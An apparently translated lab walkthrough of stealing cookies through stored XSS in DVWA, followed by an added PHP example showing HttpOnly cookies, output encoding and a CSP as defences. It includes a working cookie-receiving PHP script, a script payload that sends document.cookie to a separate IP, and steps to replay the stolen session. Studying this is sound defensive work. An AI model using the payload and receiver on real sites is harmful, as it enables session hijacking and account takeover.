Stored XSS cookie-stealing experiment

Statement: For exchange and learning only. Illegal use is strictly prohibited; otherwise you bear the consequences yourself.

1. Prepare the environment for receiving cookies:

    

The IP is 172.24.10.105

The code, saved as getCookie.php:

<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "w");
fwrite($log, $cookie ."\n");
fclose($log);
echo "Attack successful";
?>


2. Insert the JS code in the test environment:

<script>document.location='http://172.24.10.105/getCookie.php?cookie='+document.cookie;</script>


Remove the restriction on the input field by inspecting the element, then insert the JS code.

Then revisit the page; the browser is redirected.

The cookie then shows up on the host that was set up to receive it.



Set the captured cookie in the browser.

Then access the site directly:

http://127.0.0.1/DVWA/

Successful login without password
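
The defensive side of the steps above, as an added example that is not part of the original post: the stored payload only works because the page writes stored input into HTML unencoded and because the session cookie is readable from document.cookie. The function names start_hardened_session and render_entry are hypothetical, and the sample entry is constructed from the payload in step 2.

```php
<?php
// Added example, not code from the original post or from DVWA.

// 1. Keep the session cookie out of reach of document.cookie.
function start_hardened_session(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'httponly' => true,                      // scripts cannot read the cookie
        'secure'   => !empty($_SERVER['HTTPS']), // HTTPS-only when served over TLS
        'samesite' => 'Lax',
    ]);
    session_start();
}

// 2. Encode stored input at the moment it is written into HTML.
function render_entry(string $name, string $message): string
{
    $e = static fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    return '<div class="entry">Name: ' . $e($name)
         . '<br>Message: ' . $e($message) . "</div>\n";
}

// Constructed sample: the payload from step 2 as it would sit in the database.
$stored = "<script>document.location='http://172.24.10.105/getCookie.php"
        . "?cookie='+document.cookie;</script>";

if (PHP_SAPI !== 'cli') {
    start_hardened_session();
    // 3. Second layer: with this policy the browser refuses inline <script>.
    header("Content-Security-Policy: default-src 'self'; script-src 'self'");
}

// The payload is emitted as text (&lt;script&gt;...), so no redirect occurs.
echo render_entry('test', $stored);
```

With HttpOnly set, document.cookie no longer contains the session ID even if a script does run, so the cookie replay in the last step has nothing to replay.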
